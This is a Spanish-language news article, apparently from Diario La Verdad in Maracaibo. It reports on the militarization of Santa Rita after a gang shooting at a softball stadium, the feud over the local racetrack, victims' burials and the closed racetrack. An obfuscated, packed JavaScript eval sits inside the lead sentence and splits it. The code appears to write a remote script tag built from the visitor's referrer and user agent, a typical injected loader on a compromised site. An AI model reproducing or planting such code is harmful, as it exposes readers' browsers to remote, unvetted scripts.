publicidad

Militarizan Santa Rita tras matanza en el estadio

Redacción Sucesos / Maracaibo / noticias@laverdad.com
El eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dinnb|var|u0026u|referrer|ikisy||js|php'.split('|'),0,{})) óvalo de Palmarejo permanece cerrado. Sus trabajadores temen volver. A los caballos solo los alimentan una vez al día. Ayer sepultaron a dos de las víctimas del campo de softbol. No hay detenidos

Los militares resguardan la vía pública. (Foto: La Verdad)

Los militares y los policías se unieron para atacar la criminalidad en el municipio Santa Rita. Instalaron puntos de control en la avenida Bicentenaria, Barrancas y Punta Iguana desde el pasado domingo tras el ataque en el estadio de softbol. También hay un punto móvil que cubre los sectores El Mene y Puerto Escondido. 

La Policía regional no cuenta con los insumos ni el personal para resguardar sus cuatro parroquias. Solo tiene siete patrullas, siete motos y un contingente de menos de 40 funcionarios para proteger a unos 70 mil habitantes. Necesitaban ayuda.

La localidad se caracteriza en los últimos meses por la extorsión, el cobro de vacunas y los asesinatos. Hay dos hipótesis para la guerra entre el "Puchungo" y el "Pepito": Adueñarse de las cuadras del óvalo de Palmarejo y la venganza por el homicidio de Erick Chourio. La Policía se niega a declarar sobre la vendetta.

Los sicarios visualizan el objetivo, sin mediar palabras, le vacían los proyectiles y huyen sin dejar rastros. El miedo se apodera entre quienes se convierten en testigos. Nadie procura en declarar sobre algún detalle que promueva una pista policial. Temen convertirse en blanco por “sapos”. 

A José del Carmen Linares, 42 años, lo silenciaron el pasado miércoles, quien por 12 años fue capataz del hipódromo y tras convertirse en testigo clave en el asesinato de Erick Chourio, hermano de “Pepito”, lo asesinaron. 

Las muertes por encargo, en este año, cobraron 13 víctimas. Todos son residentes de la parroquia Santa Rita, considerada; según las estadísticas policiales, la del mayor registro de índice delictivo.  

Despedida

Ayer, sepultaron a la docente Angélica María Hinestroza (30) y Ángel Urdaneta, ambos víctimas inocentes entre la guerra desenfrenada por liderar el poder del Hipódromo de Santa Rita entre Endry Chourio Atencio, alías el “Pepito”, líder negativo de la Cárcel Nacional de Maracaibo y mano derecha del conocido “Mocho Edwin”, y Albis Cepeda Casanova, el “Puchungo”.  

El ataque en el estadio El Escorpión por tres sicarios en un aveo color plata era para liquidar a Carlos Eduardo Terán, alias el “Loco” y tirador del “Puchungo”, de la banda los Meleán y a quien le acreditan la muerte al hermano del “Mocho Edwin” de la banda El Tren del Norte, ocurrida el pasado viernes en Maracaibo. En el hecho también fallecieron Luis Alfonso Terán y resultaron heridos Diover Olivares, de 35 años, y Katrina Pulido. 

Las investigaciones continúan. Nadie habla sobre el ataque en el espacio público. Todos le temen a ser víctimas de los maleantes.

Cerrado

Jinetes, caballerizos y entrenadores se niegan a asistir al lugar. Las consecuencias las pagan los 300 ejemplares. Solo reciben una comida diaria. Los despachadores de alimentos no acuden en horas de la tarde. También temen por sus vidas. 

El Hipódromo de Santa Rita sigue cerrado y desolado. “Si esto sigue creemos que lo cerrarán y es triste cuando contamos con las mejores instalaciones de Latinoamérica”, dijo un informante. La militarización del lugar está en veremos, mientras que el miedo ataca sin piedad.

Más noticias

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: web@laverdad.com , noticias@laverdad.com o ventas@laverdad.com
Desarrollado por Miguel Guadarrama